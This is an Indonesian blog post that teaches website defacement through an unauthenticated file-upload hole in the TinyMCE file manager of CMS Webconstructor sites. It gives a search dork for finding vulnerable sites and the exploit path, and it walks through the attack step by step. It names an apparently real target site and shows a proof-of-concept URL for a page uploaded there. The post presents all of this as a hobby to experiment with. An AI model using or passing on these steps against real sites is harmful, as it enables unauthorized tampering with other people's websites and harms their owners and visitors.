Deface: CMS Webconstructor Upload Vulnerability

Ketemu lagi dengan saya, jangan bosen yah :-) Oke kita lanjut lagi dengan tutorial deface. Kali ini target kita adalah web dengan CMS Webconstructor yang memiliki celah untuk upload file. Seperti biasa celah upload file ini bisa kita gunakan untuk upload file deface kita :D
Dork : intext:CMS: webconstructor.pl
Exploit : http://%5Blocalhost%5D/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Allow File : html ,pdf ,ppt ,txt ,doc ,jpg
Oke setelah mengetahui 3 hal di atas kita bisa lanjut deh tutorialnya :-)
  1. Pertama kita cari dulu target kita dengan dork diatas
  2. Pilih salah satu target contoh: http://rofel.pl
  3. Kemudian coba kita exploit dengan menambahkan /tiny_mce/plugins/filemanager/InsertFile/insert_file.php setelah http://rofel.pl
  4. Maka url akan berubah menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
  5. Kemudian kita cek apakah keluar halaman file manager atau tidak, jika tidak ya cari target lain :D
  6. Kalo berhasil akan muncul tampilan seperti inime
  7. Kalo udah gini ya tinggal kita upload aja file deface kita, POC : http://rofel.pl/upload/index.html
Oke deh sekian dulu tutorial deface kali ini, selamat bereksperimen. Ingat!! Dork bisa kita modif sendiri :-)

Penulis : Unknown ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Deface: CMS Webconstructor Upload Vulnerability ini dipublish oleh Unknown pada hari . Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Deface: CMS Webconstructor Upload Vulnerability